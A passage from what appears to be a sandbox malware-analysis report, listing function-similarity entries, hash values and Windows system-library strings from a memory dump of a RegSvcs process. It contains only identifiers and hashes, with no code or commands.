• Instruction Fuzzy Hash: 90E15171A002199FEF22CE99C984BAEBBBAFF44314F14452AEA11EF251D774D940CB61
Strings
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: `$`
• API String ID: 0-197956300
• Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
• Instruction ID: 46bf9d5aa0e49a6f98937b1f546f2cef9a9a5bd7f0d1cade37b8c344fc50d197
• Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
• Instruction Fuzzy Hash: D4C1BF312043429BEB65CFA8CC41B6BBBE6BFC4318F084A2DFA968B291D775D505CB51
Strings
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID: Legacy$UEFI
• API String ID: 2994545307-634100481
• Opcode ID: eb39a30dad9bdd1a1c10978b7afd3ca1c1f215f217ea18f21afdb680f603fefd
• Instruction ID: 6e3a0a466c9a581836b7d34cadcb67ee424e89d88cf4a286ec762894a8f0b948
• Opcode Fuzzy Hash: eb39a30dad9bdd1a1c10978b7afd3ca1c1f215f217ea18f21afdb680f603fefd
• Instruction Fuzzy Hash: F7614171E046199FDB29DFA8CC40BAEBBB9FB44700F15486EE649EB291D7319901CB50
Strings
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: @$MUI
• API String ID: 0-17815947
• Opcode ID: 4eb0bb5793919812ae047da061cd3b2ceb3e7e444212e009365c807bfa7cb036
• Instruction ID: 80ee57c2bc3b5ab7a66f3caed0bea8fe952e138b7ac453cd14e9372f070a5047
• Opcode Fuzzy Hash: 4eb0bb5793919812ae047da061cd3b2ceb3e7e444212e009365c807bfa7cb036
• Instruction Fuzzy Hash: 12510871E0021EAEDF11DFA9CC90AEEBBB9FB84754F104529E611AB290DB749905CB60
Strings
• TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0159063D
• kLsE, xrefs: 01590540
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
• API String ID: 0-2547482624
• Opcode ID: 0b5c8fdca190b570f947a3c5990e41aeb8c6eda46b4814543564f76cf09f7fc5
• Instruction ID: c045c69b439c6e2276934af09093cb9bf7bfd8ef7f5a5cfb27137e803150397e
• Opcode Fuzzy Hash: 0b5c8fdca190b570f947a3c5990e41aeb8c6eda46b4814543564f76cf09f7fc5
• Instruction Fuzzy Hash: AE51B0715047429BDB24DF68C5406ABBBE9BFC4304F104C3EEA9A8B281E734D545CB92
Strings
• RtlpResUltimateFallbackInfo Exit, xrefs: 0159A309
• RtlpResUltimateFallbackInfo Enter, xrefs: 0159A2FB
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
• API String ID: 0-2876891731
• Opcode ID: 98e045a751d2da57daed018879231db87a1fdf968a984e93af757a5deafb5ff5
• Instruction ID: dab72030c4982cf8e8fd713ec913080950cf7c2fe30a1335dd2b963afb0e9e70
• Opcode Fuzzy Hash: 98e045a751d2da57daed018879231db87a1fdf968a984e93af757a5deafb5ff5
• Instruction Fuzzy Hash: F7418C71A0464ADBDB11CF59C840B6EBBF4FF84704F1444A9EE00DF295E2B5D940CBA2
Strings
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID: Cleanup Group$Threadpool!
• API String ID: 2994545307-4008356553
• Opcode ID: 063f751863b1a1ee458660fcad87b801983d5d153682114944f51a315432e6d2
• Instruction ID: 3ea5c3ae1ba7a6773c76e9554682b9610451a4ef26cb1637c3cc331e3a886b8b
• Opcode Fuzzy Hash: 063f751863b1a1ee458660fcad87b801983d5d153682114944f51a315432e6d2
• Instruction Fuzzy Hash: A001D1B2654748AFD321DF64CD45B167BE8F784B19F00893DA648CB190F374D844CB46
Strings
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: MUI
• API String ID: 0-1339004836
• Opcode ID: ac4f5ed3d8d09c2a5d625e9dc1e004d780641804e4e48da2e032205c201ab9a4
• Instruction ID: 65ff8d832bff0c4d81e18df79926ba7042df25794d9ae8271257ea0f20f25538
• Opcode Fuzzy Hash: ac4f5ed3d8d09c2a5d625e9dc1e004d780641804e4e48da2e032205c201ab9a4
• Instruction Fuzzy Hash: 5F826A75E002198FEF25CFA9C980BEDBBB5BF48310F148169E919AF391D770A941CB52
Strings
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
• Opcode ID: 1581faa1144ada766ce92ca7ef059f960b794cb24c35fe367aea4d1b7510a0f8
• Instruction ID: e2ddae38a2fe650344882bd47bd052e34b5f0b66d1beaca83b9e28b7337923d6
• Opcode Fuzzy Hash: 1581faa1144ada766ce92ca7ef059f960b794cb24c35fe367aea4d1b7510a0f8
• Instruction Fuzzy Hash: 0F916071A4121AAFEB21DF99CC85FAEBBB9FF54750F144065F600AB294D774AD00CBA0
Strings
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
• Opcode ID: 5eac0587ce231e35b948078d0d73e72a3a587bd1f21dff68a00c3df885a7228d
• Instruction ID: 2730c4c7b9c06213efd93c4554560399c4cecc59d145b692d2bd5312c4f0f446
• Opcode Fuzzy Hash: 5eac0587ce231e35b948078d0d73e72a3a587bd1f21dff68a00c3df885a7228d
• Instruction Fuzzy Hash: 1B91803190150ABEEB22AFA5DC44FAFBB79FFC5744F100029F501AB250D7769902CBA0
Strings
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: GlobalTags
• API String ID: 0-1106856819
• Opcode ID: 7a33ecc541f95399652535e51796f887c7aa3be0dec58b60b6200a7fa9c335ea
• Instruction ID: 68a78e46a734cb9974799164a33210d45bf26772d98b073e29884b59d85002a6
                                                                                                              • Opcode Fuzzy Hash: 7a33ecc541f95399652535e51796f887c7aa3be0dec58b60b6200a7fa9c335ea
                                                                                                              • Instruction Fuzzy Hash: 7C714175E0021A9FDF19CF9CD9906AEBBB1BF88710F14812DE505AB381E7719951CB60
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .mui
                                                                                                              • API String ID: 0-1199573805
                                                                                                              • Opcode ID: cdb59990749f9ca95a40806ca1f91250ce37740cc5162cc548e4677b191b3c47
                                                                                                              • Instruction ID: 51e690ce4e3e2ccb8db6a00189169f56d19f7049c6adb8c69ab9ffba47b8e9f3
                                                                                                              • Opcode Fuzzy Hash: cdb59990749f9ca95a40806ca1f91250ce37740cc5162cc548e4677b191b3c47
                                                                                                              • Instruction Fuzzy Hash: 61518372D0022A9BDF14DF99DC40AAEFBB4BF84650F05416AE911BB354DB749C02CBE4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: EXT-
                                                                                                              • API String ID: 0-1948896318
                                                                                                              • Opcode ID: 4ea8bb0f24a83e4de3047f93ec3f969f328c8750d33ee76c76173773bac3e2d6
                                                                                                              • Instruction ID: db6d926acd5ee29a2f62cf14281278c9dfe8de447f141fbac7dc718867b71fb0
                                                                                                              • Opcode Fuzzy Hash: 4ea8bb0f24a83e4de3047f93ec3f969f328c8750d33ee76c76173773bac3e2d6
                                                                                                              • Instruction Fuzzy Hash: 2F4181725483429BD710DA79C981B6FBBE8FFC8614F84092DF684DF180E674D904C7A2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryHash
                                                                                                              • API String ID: 0-2202222882
                                                                                                              • Opcode ID: f9f71523bd7147b5f336ce14459495fcf6eb7f3c5e6486ddca83ead7b0f7274d
                                                                                                              • Instruction ID: b4779608049adb8cddab0aeb9425a605efc8c49f28f5041facceb236eae3ab10
                                                                                                              • Opcode Fuzzy Hash: f9f71523bd7147b5f336ce14459495fcf6eb7f3c5e6486ddca83ead7b0f7274d
                                                                                                              • Instruction Fuzzy Hash: F14145B1D0052DABDB21DA54CC84FDFB77DAB45714F0146E5EA08AB180DB709E898F98
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: #
                                                                                                              • API String ID: 0-1885708031
                                                                                                              • Opcode ID: 9f978518afac21f0d57b059d7afb8ee5a0993be762c72ae7c601e2aa28085425
                                                                                                              • Instruction ID: 21783af9cb31f6a3f9a746dfc93ba47b54d53cb79f1a697bc3e310a0d435d6c8
                                                                                                              • Opcode Fuzzy Hash: 9f978518afac21f0d57b059d7afb8ee5a0993be762c72ae7c601e2aa28085425
                                                                                                              • Instruction Fuzzy Hash: 9431E531B00A699AEB22EB69CC50BEE7BA8EF44704F544068ED41AF282D775D815CF50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryName
                                                                                                              • API String ID: 0-215506332
                                                                                                              • Opcode ID: 2c9469abf03b4bcfafef18f3bb5afb03fdf4d24e4490cb0d0bff1083b643deb8
                                                                                                              • Instruction ID: 8d1591ce9ace2496ce715455c37ad7adc111679dc7319c2b03fe24f27390891e
                                                                                                              • Opcode Fuzzy Hash: 2c9469abf03b4bcfafef18f3bb5afb03fdf4d24e4490cb0d0bff1083b643deb8
                                                                                                              • Instruction Fuzzy Hash: F031E536900916AFEB1ADA59CC55E6FBB74FF80710F1142A9E905AB290D730DE04DBE0
                                                                                                              Strings
                                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0161895E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                              • API String ID: 0-702105204
                                                                                                              • Opcode ID: 8248e92661356623c9f6ab55b7a90bda3e52aac5063590d5937e1a62f61f2c8c
                                                                                                              • Instruction ID: 64b8d1d6ac23d240c278e710413ebece4d8e6be205238496725b71cfed1c5e57
                                                                                                              • Opcode Fuzzy Hash: 8248e92661356623c9f6ab55b7a90bda3e52aac5063590d5937e1a62f61f2c8c
                                                                                                              • Instruction Fuzzy Hash: A901F732610202AFE7346E5D9C94A6A7B6AFFC57A4B0C191CF6421B669CF206881C796
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 39187277d691cd4cb7c4e82ecaffca208e72f57aa55bdbbe96cd81deb39fdddb
                                                                                                              • Instruction ID: f0b8d7cd69eae8425c0673d5410579b29b297d91ca66977e3e5f0fe0d9517c9b
                                                                                                              • Opcode Fuzzy Hash: 39187277d691cd4cb7c4e82ecaffca208e72f57aa55bdbbe96cd81deb39fdddb
                                                                                                              • Instruction Fuzzy Hash: 6942AF316083429BE725CF68CCA0A6BBBE5BFC8700F49492DFA8297350D771D949CB52
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 54e7ce91dabbee860db94c371294d9d7fadc5b9b24868337c764f2554439b833
                                                                                                              • Instruction ID: 3c4ada9ff4a4903a70a9db42a631fad0c9de9f18feb378e6ce65a43c8751c857
                                                                                                              • Opcode Fuzzy Hash: 54e7ce91dabbee860db94c371294d9d7fadc5b9b24868337c764f2554439b833
                                                                                                              • Instruction Fuzzy Hash: 48424D75E006299FEB24CF69CC81BADBBF9BF88300F158199E949EB241D7349985CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ad3e0d6e0384656a6fb7d03ad1d47bd046be0afc4655712d9e069992395fab8f
                                                                                                              • Instruction ID: 20e116fe8f36b49dba8eb1f8b7fe8b52af07f57fb3636c27c12108de7816792c
                                                                                                              • Opcode Fuzzy Hash: ad3e0d6e0384656a6fb7d03ad1d47bd046be0afc4655712d9e069992395fab8f
                                                                                                              • Instruction Fuzzy Hash: C832DC70A007568FEB25CF69C8547BEBBF2BF84704F24451DE68A9F285DB35A842CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8bf76c7a83cd4ffa5d1892498ab858c1384ebb42b6b530d0b2763a37b5b09089
                                                                                                              • Instruction ID: 8aaef71b6924779f4fd435707c30a502e69509182f759f1cee77b31ee7ade9d1
                                                                                                              • Opcode Fuzzy Hash: 8bf76c7a83cd4ffa5d1892498ab858c1384ebb42b6b530d0b2763a37b5b09089
                                                                                                              • Instruction Fuzzy Hash: B622BE742046618BEB25CFADC894772BBF1AF85300F08855AE9D6CF386D735E452EB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 58a8d3c3dae2d1d29ee0db5fac2e361c5d1d8c6c3e5787fc762381899c1cf192
                                                                                                              • Instruction ID: 9812f7d706734afa15927172a42ec3b68331e03aa980b5826098f6ec9054a998
                                                                                                              • Opcode Fuzzy Hash: 58a8d3c3dae2d1d29ee0db5fac2e361c5d1d8c6c3e5787fc762381899c1cf192
                                                                                                              • Instruction Fuzzy Hash: E1328B75A00605CFDF25CFA8C880AAEBBF2FF88310F144569EA56AB391D734E845CB51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                              • Instruction ID: fecccd2611f362c14b9f5defd40a7cc6a8d4797a8fcd2b8817c86ddc77684ad4
                                                                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                              • Instruction Fuzzy Hash: DFF12D71E0021A9FDF25CF99D590AEEBBF5BF48710F048529EA06AF245E774D841CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4650ffbf900f7df5d51169bbe5facf3e32b699c93ed5a414a5720c49956fca17
                                                                                                              • Instruction ID: 1694610eaa3fcbd57f15b1a710079bf895729335d8a18bc0588f716ca09cc3c3
                                                                                                              • Opcode Fuzzy Hash: 4650ffbf900f7df5d51169bbe5facf3e32b699c93ed5a414a5720c49956fca17
                                                                                                              • Instruction Fuzzy Hash: C6D1F271E00A2A8BDF15CF68CC41AFEB7F9BF88304F188169D955A7241D735E9068F60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
• Opcode ID: 5f8b0b3fb6ccb64d5825ca536856928e66d78dd9117cdc27c12115f223511ff5
• Instruction ID: 51a62ff285a59cbe19d572b5a8d7a922ecfaff33d3c8de607962444ddff3cc9d
• Opcode Fuzzy Hash: 5f8b0b3fb6ccb64d5825ca536856928e66d78dd9117cdc27c12115f223511ff5
• Instruction Fuzzy Hash: 1FE17F71508342CFCB15CF28C590A6EBBE1FF89314F05896DE9998B351EB31E909CB92

Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: af7c353b32be1fb83a68e6dcffe7335eab7dad780219f73022a7c8b3cae739f3
• Instruction ID: fb85fe095832ac08a465baebab75495ab4cba96992447acf10f48aea931d0bd8
• Opcode Fuzzy Hash: af7c353b32be1fb83a68e6dcffe7335eab7dad780219f73022a7c8b3cae739f3
• Instruction Fuzzy Hash: 83D1C071A006079BDB18EF69C890ABE77F5FF94308F544629E916EF290E734E950CB60

Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
• Instruction ID: fc5bcf14e287fa5c9ccbfcd25cf61fb574695ad021e2e0eb0a9e3d972e0794df
• Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
• Instruction Fuzzy Hash: 2CB19375A00605AFDB25DF99CD40EABBBBEFF84304F18845DAA0297798DB34E905CB50

Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
• Instruction ID: 5988b7d412e276c184cc3f547b391534933f4dfa8d8f6b3985983f7811b8dac2
• Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
• Instruction Fuzzy Hash: 92B1F431610646AFDB25DBA8C850BBFBBF6BF88304F540559E6569F381EB30E941CB90

Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2215dca57fd01bab1afac735b0cdd01bb6c7d366cad7f7676c08d6a35ba24822
• Instruction ID: 997466e09dbd316a1c05eedd5188cd5cf72195dbc253d9a33c9960b417c7a065
• Opcode Fuzzy Hash: 2215dca57fd01bab1afac735b0cdd01bb6c7d366cad7f7676c08d6a35ba24822
• Instruction Fuzzy Hash: 14C15870108345DFD764CF19C494BAEBBE5BF88304F44492DEA898B291E774E908CF92

Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0ee7ca8997babccb47d3c08484442bd290823409bcd1edd68b04f5d518271d6f
• Instruction ID: a915ad3a8260706c1ee740c4da14b1311d581c41d5ddd0c5c5cf1c322ede678b
• Opcode Fuzzy Hash: 0ee7ca8997babccb47d3c08484442bd290823409bcd1edd68b04f5d518271d6f
• Instruction Fuzzy Hash: 34B15F70A002668BDB64DF68C890BADB7F5BF84704F0485E9D54AAB291EB709D85CB31

Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d7dac22db0b062a2b4005691d6faa12f25b54fbaad718ecf394c8bcdfeff3e0a
• Instruction ID: 7bb8b61ad608cfa97956a5e6a5e80baf9b33d2f5081a95fc7f4cbee4d3494d1b
• Opcode Fuzzy Hash: d7dac22db0b062a2b4005691d6faa12f25b54fbaad718ecf394c8bcdfeff3e0a
• Instruction Fuzzy Hash: DAA12632E00659AFEB21DF98C885BEEBBA4FB01754F08011AEB51AF691D7749D40CBD1

Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7c861fdefd95251dd21e52ddaf271468501957b57ec4b1a13c45917aeb1bfe42
• Instruction ID: 9eb3b467e5451931326c57747c8a4f6f21680dd06f31a85e91c1bc805d3f0cfd
• Opcode Fuzzy Hash: 7c861fdefd95251dd21e52ddaf271468501957b57ec4b1a13c45917aeb1bfe42
• Instruction Fuzzy Hash: 22A1A070B016169BEB35DF6DC990BBEB7A5FF54318F004529EA499B2C2DB34E811CB90

Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0ebde36031e6193a6600d50071067d2a836674804275a6e2dc10b1c51708af59
• Instruction ID: a1e26bce7ff292a5555ecd5d4b62d3506767966d02f2a2a93c44558209bc88c2
• Opcode Fuzzy Hash: 0ebde36031e6193a6600d50071067d2a836674804275a6e2dc10b1c51708af59
• Instruction Fuzzy Hash: BEA1CB72A10252AFC721DF18CD80B6ABBE9FF88708F45462CE5899B750DB34EC51CB91

Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
• Instruction ID: d1393dac5205affffa2739e033c67a59d6261f60c9d670ce67e6ca45cf2b4e91
• Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
• Instruction Fuzzy Hash: 0FB13971E0061ADFDF15CFA9CC90AADBBB9FF98350F148169E914AB354D730A941CB90

Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dc61b3cf30b873d4f8b2d33d21ba00ac69ff6ebd3e206e41f7c9b1252b912291
• Instruction ID: 67c053a95efe9f940cbef240a4db82e09531b9c84fe3ce866445e1385becd370
• Opcode Fuzzy Hash: dc61b3cf30b873d4f8b2d33d21ba00ac69ff6ebd3e206e41f7c9b1252b912291
• Instruction Fuzzy Hash: 4F91B075E00216AFDB15CFA8DC90BAEBFB5AF48710F194169E610EB355D7B4E9008BA0

Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 18db648eebfe8f20d92b8e8d3e08c7fcfdd8bccaf0b954e6f5acd149506cc6ee
• Instruction ID: 302bc20eb6c49223ba306611f52dd4a34523d91cc2a2986f3060c1d42b55ee7c
• Opcode Fuzzy Hash: 18db648eebfe8f20d92b8e8d3e08c7fcfdd8bccaf0b954e6f5acd149506cc6ee
• Instruction Fuzzy Hash: 13914531A40616CBEB24EB58D841B7DBBE1FF88718F454469EA459F280E734D941CBA1

Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2ffa6eceb965f4adc5d09f9335d5bcc9d89c23a941f0fb8c1996bbda66c574c9
